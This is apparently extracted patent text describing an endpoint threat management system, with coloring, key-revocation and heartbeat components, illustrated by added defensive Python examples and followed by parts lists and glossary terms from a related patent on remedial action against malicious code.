The memory 210 may store information within the computing device 206 or computer system 200. The memory 210 may include any volatile or non-volatile memory or other computer-readable medium, including without limitation a Random-Access Memory (RAM), a flash memory, a Read-Only Memory (ROM), a Programmable Read-Only Memory (PROM), an Erasable PROM (EPROM), registers, and so forth. The memory 210 may store program instructions, program data, executables, and other software and data useful for controlling operation of the computing device 200 and configuring the computing device 200 to perform functions for a user. The memory 210 may include a number of different stages and types for different aspects of operation of the computing device 206. For example, a processor (e.g., the processor 208) may include on-board memory and/or cache for faster access to certain data or instructions, and a separate, main memory or the like may be included to expand memory capacity as desired.

The memory 210 may, in general, include a non-volatile computer readable medium containing computer code that, when executed by the computing device 200, creates an execution environment for a computer program in question (e.g., code that constitutes processor firmware, a protocol stack, a database management system, an operating system, or a combination of the foregoing, and/or code that performs some or all of the steps set forth in the various flow charts and other algorithmic descriptions set forth herein). While the memory 210 is depicted as a single memory, it will be understood that any number of memories may be usefully incorporated into the computing device 206. For example, a first memory may provide non-volatile storage such as a disk drive for permanent or long-term storage of files and code even when the computing device 206 is powered down. A second memory such as a Random-Access Memory may provide volatile (but higher speed) memory for storing instructions and data for executing processes. A third memory may be used to improve performance by providing even higher speed memory physically adjacent to the processor 208 for registers, caching and so forth.

The network interface 212 may include any hardware and/or software for connecting the computing device 206 in a communicating relationship with other resources through the network 202. This may include remote resources accessible through the internet, as well as local resources available using short range communications protocols using, e.g., physical connections (e.g., ethernet), radio frequency communications (e.g., WiFi), optical communications (e.g., fiber optics, infrared, or the like), ultrasonic communications, or any combination of these or other media that might be used to carry data between the computing device 206 and other devices. The network interface 212 may, for example, include a router, a modem, a network card, an infrared transceiver, a radio frequency (RF) transceiver, a near field communications interface, a radio-frequency identification (RFID) tag reader, or any other data reading or writing resource or the like.

More generally, the network interface 212 may include any combination of hardware and software suitable for coupling the components of the computing device 206 to other computing or communications resources and, thus, may typically include one or more communication channels 222 and be connected to one or more networks (e.g., the network 202). By way of example and not limitation, this may include electronics for wired or wireless transmission of information over the network 202, either wirelessly or through a physical connection, depending on the needs of a specific implementation. As an example, the communication may be via an ethernet connection operating according to the IEEE 802.11 standard (or any variation thereof), or any other short or long range wireless networking components or the like. This may include hardware for short range data communications such as bluetooth or an infrared transceiver, which may be used to couple to other local devices, or to connect to a local area network or the like that is in turn coupled to a data network 202 such as the internet. This may also or instead include hardware/software for a WiMax connection or a cellular network connection (using, e.g., CDMA, GSM, LTE, or any other suitable protocol or combination of protocols). The network interface 212 may be included as part of the input/output interface 216 or vice-versa.

The data store 214 may be any internal memory store providing a computer-readable medium such as a disk drive, an optical drive, a magnetic drive, a flash drive, or other device capable of providing mass storage for the computing device 206. The data store 214 may store computer readable instructions, data structures, program modules, and other data for the computing device 206 or computer system 200 in a non-volatile form for subsequent retrieval and use. For example, the data store 214 may store without limitation one or more of the operating system, application programs, program data, databases, files, and other program modules or other software objects and the like.

The input/output interface 216 may support input from and output to other devices that might couple to the computing device 206. This may, for example, include serial ports (e.g., RS-232 ports), universal serial bus (USB) ports, optical ports, ethernet ports, telephone ports, audio jacks, component audio/video inputs, HDMI ports, and so forth, any of which might be used to form wired connections to other local devices. This may also or instead include an infrared interface, RF interface, magnetic card reader, or other input/output system for coupling in a communicating relationship with other local devices. It will be understood that, while the network interface 212 for network communications is described separately from the input/output interface 216 for local device communications, these two interfaces may be the same, or may share functionality, such as where a USB port is used to attach to a WiFi accessory, or where an ethernet connection is used to couple to a local network attached storage.

A peripheral 218 may include any device used to provide information to or receive information from the computing device 200. This may include human input/output (I/O) devices such as a keyboard, a mouse, a mouse pad, a track ball, a joystick, a microphone, a foot pedal, a camera, a touch screen, a scanner, or other device that might be employed by the user 224 to provide input to the computing device 206. This may also or instead include a display, a speaker, a printer, a projector, a headset or any other audiovisual device for presenting information to a user. The peripheral 218 may also or instead include a digital signal processing device, an actuator, or other device to support control or communication to other devices or components. Other I/O devices suitable for use as a peripheral 218 include haptic devices, three-dimensional rendering systems, augmented-reality displays, magnetic card readers, and so forth. In one aspect, the peripheral 218 may serve as the network interface 212, such as with a USB device configured to provide communications via short range (e.g., bluetooth, WiFi, infrared, RF, or the like) or long range (e.g., cellular data or WiMax) communications protocols. In another aspect, the peripheral 218 may provide a device to augment operation of the computing device 206, such as a global positioning system (GPS) device, a security dongle, or the like. In another aspect, the peripheral may be a storage device such as a flash card, USB drive, or other solid-state device, or an optical drive, a magnetic drive, a disk drive, or other device or combination of devices suitable for bulk storage. More generally, any device or combination of devices suitable for use with the computing device 200 may be used as the peripheral 218 as contemplated herein.

Other hardware 220 may be incorporated into the computing device 200. Examples of the other hardware 220 include a co-processor, a digital signal processing system, a math co-processor, a graphics engine, a video driver, and so forth. The other hardware 220 may also or instead include expanded input/output ports, extra memory, additional drives (e.g., a DVD drive or other accessory), and so forth. 

A bus 226 or combination of busses may serve as an electromechanical platform for interconnecting components of the computing device 200, such as the processor 208, the memory 210, the network interface 212, the other hardware 220, the data store 214, and an input/output interface. As shown in the figure, each of the components of the computing device 206 may be interconnected using the bus 226 or other communication mechanism for communicating information.

Methods and systems described herein can be realized using the processor 208 of the computer system 200 to execute one or more sequences of instructions contained in the memory 210 to perform predetermined tasks. In embodiments, the computing device 200 may be deployed as a number of parallel processors synchronized to execute code together for improved performance, or the computing device 200 may be realized in a virtualized environment where software on a hypervisor or other virtualization management facility emulates components of the computing device 200 as appropriate to reproduce some or all of the functions of a hardware instantiation of the computing device 200. 

Brief Description:

illustrates a threat management system 300 in accordance with one embodiment.

Detailed Description:

Figure 3 illustrates an exemplary threat management system 300 as contemplated herein. In general, the threat management system may include an endpoint 302 (for example, a laptop, or a device such as an IoT device), an access point 304, a server 306 and a threat management facility 308 in communication with one another directly or indirectly through a data network 316, for example, as generally described above. Each of the entities depicted in Figure 3 may, for example, be implemented on one or more computing devices such as the computing device described above with reference to Figure 2.

A number of systems may be distributed across these various components to support threat management, for example, including a coloring system 310, a key management system 312 and a heartbeat system 314, each of which may include software components executing on any of the foregoing system components, and each of which may communicate with the threat management facility 308 or an endpoint threat protection agent 318 executing on an endpoint 302, on an access point or a firewall 304, or on a server 306 to support improved threat detection and remediation.

The coloring system 310 may be used to label or 'color' software objects for improved tracking and detection of potentially harmful activity. The coloring system 310 may, for example, label files, executables, processes, network communications, data sources and so forth with any suitable label. A variety of techniques may be used to select static and/or dynamic labels for any of these various objects, and to manage the mechanics of applying and propagating coloring information as appropriate. For example, a process may inherit a color from an application that launches the process. Similarly, a file may inherit a color from a device when it is created or opened by a device, and/or a process may inherit a color from a file that the process has opened. More generally, any type of labeling, as well as rules for propagating, inheriting, changing, or otherwise manipulating such labels, may be used by the coloring system 310 as contemplated herein. A color may be or may be based on one or more reliability index values, the meeting of one or more reliability index thresholds, the rate of change of one or more reliability index values, etc. A color of a device may be used in a security policy. A color of a process, a file, a network request, and so on may be based on a color of a device, and that color may be used in a security policy.
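The inheritance rules in the paragraph above (process from launching application, file from the device that creates it, process from a file it opens) are easiest to see in code. The following is an added illustration, not code from the patent or from Sophos: the color vocabulary, its trust ordering, the reliability-index thresholds, the `ColoringSystem` class and the object names are all assumptions of this example. It also records where each object's color came from, which is what an analyst needs when a policy decision has to be explained.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Color vocabulary ordered from most to least trusted. The text leaves the
# label set open; these four values and their ordering are an assumption.
TRUST_RANK = {"trusted": 0, "unknown": 1, "suspicious": 2, "compromised": 3}


def least_trusted(a: str, b: str) -> str:
    """When two colors meet, the less trusted one wins."""
    return a if TRUST_RANK[a] >= TRUST_RANK[b] else b


def color_for_reliability(index: float) -> str:
    """Derive a color from a reliability index value (thresholds are assumed)."""
    if index >= 0.8:
        return "trusted"
    if index >= 0.5:
        return "unknown"
    if index >= 0.2:
        return "suspicious"
    return "compromised"


@dataclass
class Colored:
    kind: str            # device, application, process or file
    name: str
    color: str
    origin: List[str]    # how the color was obtained, for later review


class ColoringSystem:
    """Toy model of the coloring system: objects plus inheritance rules."""

    def __init__(self) -> None:
        self.objects: Dict[str, Colored] = {}

    def add(self, kind: str, name: str, color: str,
            origin: Optional[List[str]] = None) -> Colored:
        obj = Colored(kind, name, color, origin or ["assigned"])
        self.objects[name] = obj
        return obj

    def register_device(self, name: str, reliability_index: float) -> Colored:
        # A device's color may be based on its reliability index.
        return self.add("device", name, color_for_reliability(reliability_index),
                        [f"reliability index {reliability_index}"])

    def launch_process(self, app_name: str, proc_name: str) -> Colored:
        # A process inherits the color of the application that launched it.
        app = self.objects[app_name]
        return self.add("process", proc_name, app.color,
                        [f"inherited from application {app_name}"])

    def create_file(self, device_name: str, path: str) -> Colored:
        # A file inherits the color of the device that created it.
        dev = self.objects[device_name]
        return self.add("file", path, dev.color,
                        [f"inherited from device {device_name}"])

    def open_file(self, proc_name: str, path: str) -> str:
        # A process inherits the color of a file it opens, but only ever
        # towards less trust: opening a trusted file never whitens a process.
        proc, f = self.objects[proc_name], self.objects[path]
        new = least_trusted(proc.color, f.color)
        if new != proc.color:
            proc.origin.append(f"inherited from file {path}")
            proc.color = new
        return proc.color

    def network_allowed(self, proc_name: str) -> bool:
        """Security policy using the color: only trusted or unknown processes
        may issue network requests."""
        return TRUST_RANK[self.objects[proc_name].color] < TRUST_RANK["suspicious"]


if __name__ == "__main__":
    cs = ColoringSystem()
    cs.register_device("laptop-1", 0.9)                 # trusted
    cs.add("application", "browser", "unknown")
    cs.launch_process("browser", "browser.exe")          # unknown
    cs.register_device("usb-stick", 0.1)                 # compromised
    cs.create_file("usb-stick", "/media/usb/attachment.doc")
    cs.open_file("browser.exe", "/media/usb/attachment.doc")
    print(cs.objects["browser.exe"].color, cs.network_allowed("browser.exe"))
```

The one design choice worth noting is that `open_file` only moves a process towards less trust; if inheritance were symmetric, a suspicious process could launder its color by opening a trusted file.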

The key management system 312 may support management of keys for the endpoint 302 in order to selectively permit or prevent access to content on the endpoint 302 on a file-specific basis, a process-specific basis, an application-specific basis, a user-specific basis, or any other suitable basis in order to prevent data leakage, and in order to support more fine-grained and immediate control over access to content on the endpoint 302 when a security compromise is detected. Thus, for example, if a particular process executing on the endpoint is compromised, or potentially compromised or otherwise under suspicion, keys to that process may be revoked in order to prevent, for example, data leakage or other malicious activity. In embodiments, keys on a device may be revoked based on one or more reliability index values, the meeting of one or more reliability index thresholds, the rate of change of one or more reliability index values, etc.

The heartbeat system 314 may be used to provide periodic or aperiodic information from an endpoint about system health, security, status, etc. A heartbeat may be encrypted or plaintext, or some combination of these, and may be communicated unidirectionally (e.g., from the endpoint 302 to the threat management facility 308) or bidirectionally (e.g., between the endpoint 302 and the server 306, or any other pair of system components) on a useful schedule.

In implementations, the access point or firewall 304 may use the heartbeat system 314 to report a potential or actual compromise of a device based, for example, on a color of the device, or based on one or more reliability index values, the meeting of one or more reliability index thresholds, the rate of change of one or more reliability index values, etc. The heartbeat from the access point 304 may be communicated to the server 306 (for example, an administrative server), or directly or indirectly to the threat management facility 308. If the endpoint 302 has an endpoint threat protection facility 318, the endpoint threat protection facility 318 may be used to investigate the status further, or to take remedial measures, again by communication using the secure heartbeat.

In general, these various monitoring and management systems may cooperate to provide improved threat detection and response. For example, the coloring system 310 may be used to evaluate when a particular device is potentially compromised, and a potential threat may be confirmed based on an interrupted heartbeat from the heartbeat system 314 or by information communicated in a heartbeat. The key management system 312 may then be used to revoke keys to a process so that no further files can be opened, deleted or otherwise modified. More generally, the cooperation of these systems enables a wide variety of reactive measures that can improve detection and remediation of potential threats to an endpoint.
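The key management, heartbeat and cooperation paragraphs above describe one reactive loop: an endpoint whose reported reliability index crosses a threshold, changes too fast, or whose heartbeat stops altogether, has its process keys revoked so that no further files can be opened. The following is an added example, not code from the patent or from Sophos, that wires the three pieces together over a constructed heartbeat log. The heartbeat interval, the missed-heartbeat limit, the index threshold and maximum drop, the class names and the endpoint and process names are all assumptions of the example.

```python
from collections import deque
from typing import Deque, Dict, List, Optional, Tuple


class KeyManager:
    """Toy stand-in for the key management system: per-process keys that are
    revoked for a whole endpoint once it falls under suspicion."""

    def __init__(self) -> None:
        self._keys: Dict[Tuple[str, str], bytes] = {}
        self._revoked_endpoints: set = set()

    def issue(self, endpoint: str, process: str, key: bytes) -> None:
        self._keys[(endpoint, process)] = key

    def key_for(self, endpoint: str, process: str) -> Optional[bytes]:
        # A revoked endpoint gets no keys back, so its processes can open
        # no further protected files.
        if endpoint in self._revoked_endpoints:
            return None
        return self._keys.get((endpoint, process))

    def revoke_endpoint(self, endpoint: str) -> List[str]:
        self._revoked_endpoints.add(endpoint)
        return sorted(p for (e, p) in self._keys if e == endpoint)


class HeartbeatMonitor:
    """Toy stand-in for the heartbeat system: remembers when each endpoint last
    reported and the last two reliability index values it sent."""

    def __init__(self, interval: float, missed_limit: int = 3,
                 min_index: float = 0.3, max_drop: float = 0.4) -> None:
        self.interval = interval          # expected seconds between heartbeats
        self.missed_limit = missed_limit  # missed beats before "interrupted"
        self.min_index = min_index        # reliability index threshold
        self.max_drop = max_drop          # largest tolerated drop per beat
        self.last_seen: Dict[str, float] = {}
        self.history: Dict[str, Deque[float]] = {}

    def record(self, endpoint: str, t: float, index: float) -> Optional[str]:
        """Store a heartbeat; return a reason when its content indicates compromise."""
        self.last_seen[endpoint] = t
        hist = self.history.setdefault(endpoint, deque(maxlen=2))
        previous = hist[-1] if hist else None
        hist.append(index)
        if index < self.min_index:
            return f"reliability index {index} below threshold {self.min_index}"
        if previous is not None and previous - index > self.max_drop:
            return f"reliability index fell {previous - index:.2f} in one interval"
        return None

    def interrupted(self, endpoint: str, now: float) -> bool:
        """True once more than missed_limit heartbeats have gone unanswered."""
        last = self.last_seen.get(endpoint)
        return last is not None and now - last > self.missed_limit * self.interval


class ThreatManagementFacility:
    """Ties the two together: any confirmed reason revokes the endpoint's keys."""

    def __init__(self, interval: float) -> None:
        self.keys = KeyManager()
        self.heartbeats = HeartbeatMonitor(interval)
        self.revoked_for: Dict[str, str] = {}   # endpoint -> reason

    def ingest(self, t: float, endpoint: str, index: float) -> Optional[str]:
        reason = self.heartbeats.record(endpoint, t, index)
        if reason and endpoint not in self.revoked_for:
            self.keys.revoke_endpoint(endpoint)
            self.revoked_for[endpoint] = reason
        return reason

    def sweep(self, now: float) -> Dict[str, str]:
        """Periodic check for endpoints that simply stopped reporting."""
        newly: Dict[str, str] = {}
        for endpoint in list(self.heartbeats.last_seen):
            if endpoint not in self.revoked_for and self.heartbeats.interrupted(endpoint, now):
                self.keys.revoke_endpoint(endpoint)
                self.revoked_for[endpoint] = newly[endpoint] = "heartbeat interrupted"
        return newly


# Constructed sample heartbeat log: (seconds, endpoint, reliability index).
# laptop-1 degrades sharply, laptop-2 goes silent after t=10, laptop-3 is healthy.
SAMPLE_HEARTBEATS = [
    (0, "laptop-1", 0.90), (0, "laptop-2", 0.90), (0, "laptop-3", 0.90),
    (10, "laptop-1", 0.85), (10, "laptop-2", 0.90), (10, "laptop-3", 0.90),
    (20, "laptop-1", 0.40), (20, "laptop-3", 0.90),
    (30, "laptop-3", 0.90), (40, "laptop-3", 0.90),
]


def run_scenario() -> Tuple[ThreatManagementFacility, Dict[str, str]]:
    tm = ThreatManagementFacility(interval=10)
    for endpoint in ("laptop-1", "laptop-2", "laptop-3"):
        tm.keys.issue(endpoint, "word.exe", b"key-" + endpoint.encode())
    for t, endpoint, index in SAMPLE_HEARTBEATS:
        tm.ingest(t, endpoint, index)
    swept = tm.sweep(now=45)
    return tm, swept


if __name__ == "__main__":
    tm, swept = run_scenario()
    print(tm.revoked_for, swept)
```

Two details matter in practice: `record` never un-revokes (a later healthy heartbeat from a revoked endpoint is not trusted on its own, since the agent itself may be compromised), and the interruption check lives in a separate `sweep` because a silent endpoint by definition produces no event to react to.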


Parts List

102 security management facility
104 threat research facility
106 network access rules facility
108 administration facility
110 firewall
112 security facility
114 clients
116 clients
118 clients
120 clients
122 network devices
124 network devices
126 clients
128 clients
130 clients
132 network devices
134 network devices
136 server
138 server
140 firewall
142 server
144 appliance
146 policy management
148 detection techniques
150 updates
152 remedial actions
154 network threats
156 definitions
158 physical proximity threats
160 internet
162 secondary location threat network
164 testing
166 appliance
168 threat management facility
170 network
200 computer system
202 network
204 external device
206 computing device
208 processor
210 memory
212 network interface
214 data store
216 input/output interface
218 peripherals
220 other hardware
222 communication channels
224 user
226 bus
300 threat management system
302 endpoint
304 access point or firewall
306 server
308 threat management facility
310 coloring system
312 key management system
314 heartbeat system
316 data network
318 endpoint threat protection facility


Remedial Action Against Malicious Code at a Client Facility


Drawings

Brief Description:

illustrates an item 100 (deleted) in accordance with one embodiment.

Detailed Description:

Parts List

102 client facility

104 gateway facility

106 network

108 security facility

110 network control facility

112 application

114

116 database

118 policy facility

120 remedial action facility

122 network access control

124 network access rules

126 server

128 laptop computer

130 smart device


Terms/Definitions

IDE files

reported information

supplemental file

threat notice

block list

commands, definitions, or instructions

associated malicious code files

plurality

established rules

network resources

rules or policies

network access locations

desktop computer

user type

gateway facility

known malicious code

computing device

test file

particular enterprise

firmware

intranet

communication

combination

most recent malicious code definitions

applications and files

same network location

second embodiment

update

all the rules

resides

streaming file

certain types

block

one network

actions

protection

level

preparedness

client computer facility

planned update

network

same network

new IDE file

desired network location

action upon

rules

web browser

user request

successful network access request

interpretation

network control facility

user network access request

recording facility

at least one command

demand basis

updated rules

remedial action request architecture

data file and command file

data file

policy facility

malicious file

rules provider

computer facility

IDE management facility

network computing device

allowed list

command

other activities

external network

control

malicious application

access databases

received malicious code alert

network site reputation database

remedial action facility

generic rule

black list

set time period

streaming file or portions

update facility

attempt

network access port

denied network access

other client computing facilities

acceptable network site database

at least one instruction

organization hierarchy

tablet computer

security management facility

database

testing facility

file information

network access capability

result

type

IDE management

hardware

unacceptable network site database

network access rules management facility

generic set

legitimate application

virus identities

requested network site

instant messenger access

streaming files

network access device

action

malicious code

ability

blocks

overall security

gateway

certain applications and files

malicious applications

denied network location

streaming file management

access rights

at least part

parsed instructions

list

parsed data

commands

policy database

access rules

example

outgoing files

stored streaming file

additional actions

requested access

periodic basis

new updates

network access requests

white list

direct control

application access request

capability

IDE information

network access rules

known malicious code information

testing information

malicious code scan

computing facility

number

security configurations

at least one protocol

network access

able to discover malicious code

rapid updating

updating

location

network locations

computer facilities

malicious code infected

corrective action

instructions

enterprise wide access rules

management

fixed periodic basis

enterprise rules

management facility

access request denial

external networks

address information

network accesses

test management facility

subset

rule evaluation

received information

application

requested network location

rules database

reaction

external computing facilities

text file

client computing facilities

allow list

policy

website

user

laptop computer

data

internet

access request

resident network

sporting website

only the personnel

adequate protection

document application or document file

individual client computing facility

transmitted

updates

peer-to-peer access request

scanning files or applications

outgoing file

other network locations

distribution system

additional attempts

connectivity

new malicious code

existing IDE file

reporting facility

files

Peer-to-Peer network

automatic and manual methods

network location

checking streaming files

malicious application network access

IDE file

security management

wireless network

other computer facilities

various aspects

access rights and permissions

remedial actions

distribution

incoming files

test files

entire enterprise

other rule evaluation method

network access rules management

blocked access

demand

malicious code descriptions

request

regular expression rule evaluation

virus description language

predefined rule sets

defense

rule

software, hardware

continual updating

IDE provider

access control

steps

protocol

software file

access

auto-requested network request

application capabilities

computer facility type

network access request

wired network

first command

external client computing facilities

requested website

FTP access

databases

only support personnel

bandwidth

threats

malicious application information

denied network access request

parsed information

isolation

requested network site interaction

altered malicious code

additional malicious code

continual defense

other security measures

outcome

IDE definitions

determination

policy management facility

command file

alert

more than one command

information file

firmware application

network administrator

other client computing facilities and networks

smart phone computing device

external computer devices

second network location

sporting websites

quarantine

support

second level

network access control

databases and access rules

client facility

applications

similar manner

deny access rules

enterprise

network access policies

websites

identified application

incoming file

information

definitions

contents

certain actions

alert basis

networks

different network locations

predefined rules

external computing facility

known or potential malicious code

search

source

embodiment

possibility

timely updates

data or commands

malicious code information

departments

file

facilities

more than one level

software application

customers

virus identity file

first embodiment

various actions

computing facilities

internal client computing facility

other networks

smart device

command or command file

security facility

sending

denied network application request

indication

handheld computer

rules evaluation

IM activity

application type

defined access rules

source application

client computing facility

known malicious code file

network access permissions

server

acceptability

policies

work

facility

different access location

second command

information store

executing applications

associated client facilities

rules evaluation request

embodiments

testing

malicious application protection

denied access

provider

scanning

system administrator

databases and text files

remedial action architecture

latest malicious code

client computer facilities

file or application